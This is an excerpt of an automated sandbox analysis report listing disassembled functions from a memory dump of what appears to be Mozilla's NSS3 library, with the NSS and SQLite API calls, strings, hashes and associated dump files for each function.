PR_Unlock.NSS3(890008E8), ref: 6C5F5F55
PR_SetError.NSS3(00000000,00000000), ref: 6C5F5F6D
SECMOD_UpdateSlotList.NSS3(8B4274C0), ref: 6C5F5F7D

Part of subcall function 6C5F5220: TlsGetValue.KERNEL32(00000000,890008E8,?,6C5F5F82,8B4274C0), ref: 6C5F5248
Part of subcall function 6C5F5220: EnterCriticalSection.KERNEL32(0F6C6C0D,?,6C5F5F82,8B4274C0), ref: 6C5F525C
Part of subcall function 6C5F5220: PR_SetError.NSS3(00000000,00000000), ref: 6C5F528E
Part of subcall function 6C5F5220: PR_Unlock.NSS3(0F6C6BF1), ref: 6C5F5299
Part of subcall function 6C5F5220: free.MOZGLUE(00000000), ref: 6C5F52A9

Strings

q]_l, xrefs: 6C5F5EDB, 6C5F5F09

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: CriticalEnterErrorSectionUnlockValue$ListSlotUpdatefreestrlen
String ID: q]_l
API String ID: 3150690610-4018457070
Opcode ID: 5165d6dbef3810127e5ea5a070692cb4b2bddae43bddd4768a0405c0740b79bf
Instruction ID: 73f9ff7a6f596f2c2126ae3e686c8bde53f30489fda7e91840e86774c752cf2a
Opcode Fuzzy Hash: 5165d6dbef3810127e5ea5a070692cb4b2bddae43bddd4768a0405c0740b79bf
Instruction Fuzzy Hash: 7E210AF1D002049FEB149F64EC416EFBBB4EF49308F544029E91AA7701EB319958CBD5

Function 6C5B8CF0 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 76COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32(00000000,00000000,?,6C5C124D,00000001), ref: 6C5B8D19
EnterCriticalSection.KERNEL32(?,?,?,?,6C5C124D,00000001), ref: 6C5B8D32
PL_ArenaRelease.NSS3(?,?,?,?,?,6C5C124D,00000001), ref: 6C5B8D73
PR_Unlock.NSS3(?,?,?,?,?,6C5C124D,00000001), ref: 6C5B8D8C

Part of subcall function 6C64DD70: TlsGetValue.KERNEL32 ref: 6C64DD8C
Part of subcall function 6C64DD70: LeaveCriticalSection.KERNEL32(00000000), ref: 6C64DDB4

PR_Unlock.NSS3(?,?,?,?,?,6C5C124D,00000001), ref: 6C5B8DBA

Strings

KRAM, xrefs: 6C5B8CF9
KRAM, xrefs: 6C5B8D3E

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: CriticalSectionUnlockValue$ArenaEnterLeaveRelease
String ID: KRAM$KRAM
API String ID: 2419422920-169145855
Opcode ID: d9cf3566258362499c43b96a81ef8ad157bd3a9adb8fc12b755d20a6f2c3102c
Instruction ID: 516978428716093cd040ec48da78ebf995ae4887868f3e2c3e8f340a519bc57f
Opcode Fuzzy Hash: d9cf3566258362499c43b96a81ef8ad157bd3a9adb8fc12b755d20a6f2c3102c
Instruction Fuzzy Hash: F121A1B5A04602CFCB00EF79C89455ABBF0FF45318F15896BD99997701DB30D841CB92

Function 6C6B0ED0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 68COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(Assertion failure: %s, at %s:%d,00000000,00000001,?,00000001,00000000,00000000), ref: 6C6B0EE6
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,00000001,00000000,00000000), ref: 6C6B0EFA

Part of subcall function 6C59AEE0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000001,?,00000000,?,00000001,?,?,?,00000001,00000000,00000000), ref: 6C59AF0E

__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C6B0F16
fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C6B0F1C
DebugBreak.KERNEL32(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C6B0F25
abort.API-MS-WIN-CRT-RUNTIME-L1-1-0(?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C6B0F2B

Strings

Assertion failure: %s, at %s:%d, xrefs: 6C6B0ED9, 6C6B0EE5, 6C6B0F06, 6C6B0F0B
Aborting, xrefs: 6C6B0EB3

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: __acrt_iob_func$BreakDebugPrint__stdio_common_vfprintfabortfflush
String ID: Aborting$Assertion failure: %s, at %s:%d
API String ID: 2948422844-1374795319
Opcode ID: ebb0575c473ff1ea33d7470475006732366f504b8817f220dcf6f15524bfd90a
Instruction ID: 3e856e0baa370f93de1b6688ce370b167014efd969db3792465f9886b2201cb6
Opcode Fuzzy Hash: ebb0575c473ff1ea33d7470475006732366f504b8817f220dcf6f15524bfd90a
Instruction Fuzzy Hash: CC01ADB6A00204BBDF11AF65EC8589B3F6DEF46368F004065FD1A97601D631EE2087AA

Function 6C691C40 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 45COMMON

Download Yara Rule

APIs

sqlite3_mprintf.NSS3(non-deterministic use of %s() in %s,?,a CHECK constraint,w=Yl,?,?,6C594E1D), ref: 6C691C8A
sqlite3_free.NSS3(00000000), ref: 6C691CB6

Strings

a CHECK constraint, xrefs: 6C691C76, 6C691C81
w=Yl, xrefs: 6C691C44
a generated column, xrefs: 6C691C6C
non-deterministic use of %s() in %s, xrefs: 6C691C85
an index, xrefs: 6C691C67

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: sqlite3_freesqlite3_mprintf
String ID: a CHECK constraint$a generated column$an index$non-deterministic use of %s() in %s$w=Yl
API String ID: 1840970956-2161169664
Opcode ID: 92923ac81866f5286ddd57a2dda09aff872f332ce378ce75e1a0592c5cd0e24e
Instruction ID: 247df7339d73646197c5e0c7b5d9a7926cf29d4643b22dce6894a1d9d97b5cc6
Opcode Fuzzy Hash: 92923ac81866f5286ddd57a2dda09aff872f332ce378ce75e1a0592c5cd0e24e
Instruction Fuzzy Hash: 0B014CB5A001049BD700BF2CD84297177E5EFC634CB15086DDC458BB52EB31EC56C755

Function 6C674D80 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 36COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C674DC3
sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CA4,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C674DE0

Strings

API call with %s database connection pointer, xrefs: 6C674DBD
%s at line %d of [%.10s], xrefs: 6C674DDA
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C674DCB
misuse, xrefs: 6C674DD5
invalid, xrefs: 6C674DB8

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
API String ID: 632333372-2974027950
Opcode ID: 1ac1ced969a1bb2b16d60df67a9a5bcaa05f6a6eccbc1e2c28d3a929b61612f2
Instruction ID: 2eb1289bfd0f66bf9187a9419378cca65a69f056fe1cf514a66f9de65d8fec36
Opcode Fuzzy Hash: 1ac1ced969a1bb2b16d60df67a9a5bcaa05f6a6eccbc1e2c28d3a929b61612f2
Instruction Fuzzy Hash: 50F05921F085246BE7105015DE28FE733D54F02329F470DA1ED446BE93D24ABC508AED

Function 6C674DF0 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 35COMMON

Download Yara Rule

APIs

sqlite3_log.NSS3(00000015,API call with %s database connection pointer,invalid), ref: 6C674E30
sqlite3_log.NSS3(00000015,%s at line %d of [%.10s],misuse,00029CAD,9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4), ref: 6C674E4D

Strings

API call with %s database connection pointer, xrefs: 6C674E2A
%s at line %d of [%.10s], xrefs: 6C674E47
9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4, xrefs: 6C674E38
misuse, xrefs: 6C674E42
invalid, xrefs: 6C674E25

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: sqlite3_log
String ID: %s at line %d of [%.10s]$9547e2c38a1c6f751a77d4d796894dec4dc5d8f5d79b1cd39e1ffc50df7b3be4$API call with %s database connection pointer$invalid$misuse
API String ID: 632333372-2974027950
Opcode ID: a8045c8905c8a7b446ff130ca8ceb45c61c795945591d4802f8e96ecbf465385
Instruction ID: 3aa69f06d319f9493e1ab1a8857bca76665f5b1752930fee05f4c514d4846878
Opcode Fuzzy Hash: a8045c8905c8a7b446ff130ca8ceb45c61c795945591d4802f8e96ecbf465385
Instruction Fuzzy Hash: 0AF02E11F489186BE63052159C18FF737854B0133AF4A4CA1EA0467E93D749AC735AFD

Function 6C5A9FB0 Relevance: 12.2, APIs: 8, Instructions: 198COMMON

Download Yara Rule

APIs

TlsGetValue.KERNEL32 ref: 6C5AA086
EnterCriticalSection.KERNEL32(?), ref: 6C5AA09B
PR_Unlock.NSS3(?), ref: 6C5AA0B7
PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C5AA0E9
TlsGetValue.KERNEL32 ref: 6C5AA11B
EnterCriticalSection.KERNEL32(?), ref: 6C5AA12F
PR_Unlock.NSS3(?), ref: 6C5AA148

Part of subcall function 6C5C1A40: PR_Now.NSS3(?,00000000,6C5A28AD,00000000,?,6C5BF09A,00000000,6C5A28AD,6C5A93B0,?,6C5A93B0,6C5A28AD,00000000,?,00000000), ref: 6C5C1A65

Part of subcall function 6C5C1940: CERT_DestroyCertificate.NSS3(00000000,00000000,?,6C5C4126,?), ref: 6C5C1966

PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C5AA1A3

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Arena_CriticalEnterFreeSectionUnlockUtilValue$CertificateDestroy
String ID:
API String ID: 3953697463-0
Opcode ID: 74a902ff2c068176366164e7d036997c728cb35340cb916a3e510a81b351ccb1
Instruction ID: 3182e5bca730b11291953bc25aadc6811210e072071736bb9d2e7e27513670d1
Opcode Fuzzy Hash: 74a902ff2c068176366164e7d036997c728cb35340cb916a3e510a81b351ccb1
Instruction Fuzzy Hash: 6851C8B5A00201ABEB109FABDC44AAF77B9BF86308F15852DDC1997701EF31D946CA91

Function 6C5E0C90 Relevance: 12.2, APIs: 8, Instructions: 191memorythreadCOMMON

Download Yara Rule

APIs

PR_SetError.NSS3(00000000,00000000,6C5E1444,?,00000001,?,00000000,00000000,?,?,6C5E1444,?,?,00000000,?,?), ref: 6C5E0CB3

Part of subcall function 6C64C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C64C2BF

PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6C5E1444,?,00000001,?,00000000,00000000,?,?,6C5E1444,?), ref: 6C5E0DC1
PORT_Strdup_Util.NSS3(?,?,?,?,?,?,6C5E1444,?,00000001,?,00000000,00000000,?,?,6C5E1444,?), ref: 6C5E0DEC

Part of subcall function 6C600F10: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,00000000,?,?,6C5A2AF5,?,?,?,?,?,6C5A0A1B,00000000), ref: 6C600F1A
Part of subcall function 6C600F10: malloc.MOZGLUE(00000001), ref: 6C600F30
Part of subcall function 6C600F10: memcpy.VCRUNTIME140(00000000,?,00000001), ref: 6C600F42

SECITEM_AllocItem_Util.NSS3(00000000,00000000,?,?,?,?,?,?,6C5E1444,?,00000001,?,00000000,00000000,?), ref: 6C5E0DFF
memcpy.VCRUNTIME140(?,?,?,?,?,?,?,?,?,?,?,6C5E1444,?,00000001,?,00000000), ref: 6C5E0E16
free.MOZGLUE(?,?,?,?,?,?,?,?,?,6C5E1444,?,00000001,?,00000000,00000000,?), ref: 6C5E0E53
PR_GetCurrentThread.NSS3(?,?,?,?,6C5E1444,?,00000001,?,00000000,00000000,?,?,6C5E1444,?,?,00000000), ref: 6C5E0E65
PR_SetError.NSS3(FFFFE089,00000000,?,?,?,?,6C5E1444,?,00000001,?,00000000,00000000,?), ref: 6C5E0E79

Part of subcall function 6C5F1560: TlsGetValue.KERNEL32(00000000,?,6C5C0844,?), ref: 6C5F157A
Part of subcall function 6C5F1560: EnterCriticalSection.KERNEL32(?,?,?,6C5C0844,?), ref: 6C5F158F
Part of subcall function 6C5F1560: PR_Unlock.NSS3(?,?,?,?,6C5C0844,?), ref: 6C5F15B2

Part of subcall function 6C5BB1A0: DeleteCriticalSection.KERNEL32(5B5F5EDC,6C5C1397,00000000,?,6C5BCF93,5B5F5EC0,00000000,?,6C5C1397,?), ref: 6C5BB1CB
Part of subcall function 6C5BB1A0: free.MOZGLUE(5B5F5EC0,?,6C5BCF93,5B5F5EC0,00000000,?,6C5C1397,?), ref: 6C5BB1D2

Part of subcall function 6C5B89E0: TlsGetValue.KERNEL32(00000000,-00000008,00000000,?,?,6C5B88AE,-00000008), ref: 6C5B8A04
Part of subcall function 6C5B89E0: EnterCriticalSection.KERNEL32(?), ref: 6C5B8A15
Part of subcall function 6C5B89E0: memset.VCRUNTIME140(6C5B88AE,00000000,00000132), ref: 6C5B8A27
Part of subcall function 6C5B89E0: PR_Unlock.NSS3(?), ref: 6C5B8A35

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: CriticalErrorSectionValue$EnterUnlockUtilfreememcpy$AllocCurrentDeleteItem_Strdup_Threadmallocmemsetstrlen
String ID:
API String ID: 1601681851-0
Opcode ID: 98925f0d9da71f1d26eee753076a8d224c080f6ef3dc992354587e9e23781f1d
Instruction ID: eccd63aab8cf4ee7a42015871c603cb38dad301bd6aa53c07ec8cdb2094ec24a
Opcode Fuzzy Hash: 98925f0d9da71f1d26eee753076a8d224c080f6ef3dc992354587e9e23781f1d
Instruction Fuzzy Hash: 535196F6E002019FEB009F64DD81AAB37A89F8921CF150475EC1997712FF31ED1997A6

Function 6C596E50 Relevance: 12.2, APIs: 8, Instructions: 189COMMON

Download Yara Rule

APIs

sqlite3_value_text.NSS3(?,?), ref: 6C596ED8
sqlite3_value_text.NSS3(?,?), ref: 6C596EE5
memcmp.VCRUNTIME140(00000000,?,?,?,?), ref: 6C596FA8
sqlite3_value_text.NSS3(00000000,?), ref: 6C596FDB
sqlite3_result_error_nomem.NSS3(?,?,?,?,?), ref: 6C596FF0
sqlite3_value_blob.NSS3(?,?), ref: 6C597010
sqlite3_value_blob.NSS3(?,?), ref: 6C59701D
sqlite3_value_text.NSS3(00000000,?,?,?), ref: 6C597052

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: sqlite3_value_text$sqlite3_value_blob$memcmpsqlite3_result_error_nomem
String ID:
API String ID: 1920323672-0
Opcode ID: 576a9bb712dd1f221f670df5efd3606de18f1aa4ca5585fe6575e9f65f375603
Instruction ID: f3fac11181dc5d3ff6fdb69f60c2ad4e63ec6cf5677440dabe3e1b0003e1e2a5
Opcode Fuzzy Hash: 576a9bb712dd1f221f670df5efd3606de18f1aa4ca5585fe6575e9f65f375603
Instruction Fuzzy Hash: B961F7B1E1428ACFDB40CF65CC107EEB7B2AF85308F1841A5D416ABB54EB369D19CB91

Function 6C608F80 Relevance: 12.2, APIs: 8, Instructions: 158memoryCOMMON

Download Yara Rule

APIs

SECOID_FindOID_Util.NSS3(?,?,FFFFE005,?,6C607313), ref: 6C608FBB

Part of subcall function 6C6007B0: PL_HashTableLookupConst.NSS3(?,FFFFFFFF,?,?,6C5A8298,?,?,?,6C59FCE5,?), ref: 6C6007BF
Part of subcall function 6C6007B0: PL_HashTableLookup.NSS3(?,?), ref: 6C6007E6
Part of subcall function 6C6007B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C60081B
Part of subcall function 6C6007B0: PR_SetError.NSS3(FFFFE08F,00000000), ref: 6C600825

SECOID_FindOID_Util.NSS3(?,?,?,FFFFE005,?,6C607313), ref: 6C609012
SECOID_FindOID_Util.NSS3(?,?,?,?,FFFFE005,?,6C607313), ref: 6C60903C
SECITEM_CompareItem_Util.NSS3(?,?,?,?,?,?,FFFFE005,?,6C607313), ref: 6C60909E
PORT_ArenaGrow_Util.NSS3(?,?,?,00000001,?,?,?,?,?,?,FFFFE005,?,6C607313), ref: 6C6090DB
PORT_ArenaAlloc_Util.NSS3(?,00000008,?,?,?,?,?,?,FFFFE005,?,6C607313), ref: 6C6090F1

Part of subcall function 6C6010C0: TlsGetValue.KERNEL32(?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C6010F3
Part of subcall function 6C6010C0: EnterCriticalSection.KERNEL32(?,?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C60110C
Part of subcall function 6C6010C0: PL_ArenaAllocate.NSS3(?,?,?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C601141
Part of subcall function 6C6010C0: PR_Unlock.NSS3(?,?,?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C601182
Part of subcall function 6C6010C0: TlsGetValue.KERNEL32(?,6C5A8802,00000000,00000008,?,6C59EF74,00000000), ref: 6C60119C

PR_SetError.NSS3(FFFFE005,00000000,?,?,?,FFFFE005,?,6C607313), ref: 6C60906B

Part of subcall function 6C64C2A0: TlsGetValue.KERNEL32(FFFFE89D,00000000,?,?,?,?,?,?,?,?,?,?,?,00000001,00000000,00000000), ref: 6C64C2BF

PR_SetError.NSS3(FFFFE005,00000000,?,FFFFE005,?,6C607313), ref: 6C609128

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126402918.000000006C705000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c520000_file.jbxd

Similarity

API ID: Util$Error$ArenaFindValue$HashLookupTable$Alloc_AllocateCompareConstCriticalEnterGrow_Item_SectionUnlock
String ID:
API String ID: 3590961175-0
Opcode ID: 2fc2936615f096d3f3ee8ad3ca23cfff263c484281e358dca533e153235934d8
Instruction ID: 4c719e93695fc10708bd9705c62f3789377c59be90afe47a8cce2c767d7092c9
Opcode Fuzzy Hash: 2fc2936615f096d3f3ee8ad3ca23cfff263c484281e358dca533e153235934d8
Instruction Fuzzy Hash: 4651E971B002018FEB18CF69DE44B56B3F6AF4535CF154069E916E7B62EB32E804CB99

Function 6C5B9C50 Relevance: 12.1, APIs: 8, Instructions: 137COMMON

Download Yara Rule

APIs

Part of subcall function 6C5B8850: calloc.MOZGLUE(00000001,00000028,00000000,?,?,6C5C0715), ref: 6C5B8859
Part of subcall function 6C5B8850: PR_NewLock.NSS3 ref: 6C5B8874
Part of subcall function 6C5B8850: PL_InitArenaPool.NSS3(-00000008,NSS,00000800,00000008), ref: 6C5B888D

PR_NewLock.NSS3 ref: 6C5B9CAD

Part of subcall function 6C6698D0: calloc.MOZGLUE(00000001,00000084,6C590936,00000001,?,6C59102C), ref: 6C6698E5

Part of subcall function 6C5907A0: TlsGetValue.KERNEL32(00000000,?,?,?,?,6C52204A), ref: 6C5907AD
Part of subcall function 6C5907A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C52204A), ref: 6C5907CD
Part of subcall function 6C5907A0: TlsSetValue.KERNEL32(00000000,?,?,?,?,6C52204A), ref: 6C5907D6
Part of subcall function 6C5907A0: calloc.MOZGLUE(00000001,00000144,?,?,?,?,6C52204A), ref: 6C5907E4
Part of subcall function 6C5907A0: TlsSetValue.KERNEL32(00000000,?,6C52204A), ref: 6C590864
Part of subcall function 6C5907A0: calloc.MOZGLUE(00000001,0000002C), ref: 6C590880
Part of subcall function 6C5907A0: TlsSetValue.KERNEL32(00000000,?,?,6C52204A), ref: 6C5908CB
Part of subcall function 6C5907A0: TlsGetValue.KERNEL32(?,?,6C52204A), ref: 6C5908D7
Part of subcall function 6C5907A0: TlsGetValue.KERNEL32(?,?,6C52204A), ref: 6C5908FB

TlsGetValue.KERNEL32 ref: 6C5B9CE8
EnterCriticalSection.KERNEL32(?,?,6C5BECEC,6C5C2FCD,00000000,?,6C5C2FCD,?), ref: 6C5B9D01
TlsGetValue.KERNEL32(?,?,?,6C5BECEC,6C5C2FCD,00000000,?,6C5C2FCD,?), ref: 6C5B9D38
EnterCriticalSection.KERNEL32(?,?,6C5BECEC,6C5C2FCD,00000000,?,6C5C2FCD,?), ref: 6C5B9D4D
PR_Unlock.NSS3 ref: 6C5B9D70
PR_Unlock.NSS3 ref: 6C5B9DC3
PR_NewLock.NSS3 ref: 6C5B9DDD

Part of subcall function 6C5B88D0: TlsGetValue.KERNEL32(00000000,00000000,00000000,?,6C5C0725,00000000,00000058), ref: 6C5B8906
Part of subcall function 6C5B88D0: EnterCriticalSection.KERNEL32(?), ref: 6C5B891A
Part of subcall function 6C5B88D0: PL_ArenaAllocate.NSS3(?,?), ref: 6C5B894A
Part of subcall function 6C5B88D0: calloc.MOZGLUE(00000001,6C5C072D,00000000,00000000,00000000,?,6C5C0725,00000000,00000058), ref: 6C5B8959
Part of subcall function 6C5B88D0: memset.VCRUNTIME140(?,00000000,?), ref: 6C5B8993
Part of subcall function 6C5B88D0: PR_Unlock.NSS3(?), ref: 6C5B89AF

Memory Dump Source

Source File: 00000000.00000002.2126042651.000000006C521000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C520000, based on PE: true

Associated: 00000000.00000002.2125986642.000000006C520000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126200868.000000006C6BF000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126233387.000000006C6FE000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126327153.000000006C6FF000.00000008.00000001.01000000.00000009.sdmpDownload File
Associated: 00000000.00000002.2126346509.000000006C700000.00000004.00000001.01000000.00000009.sdmpDownload File
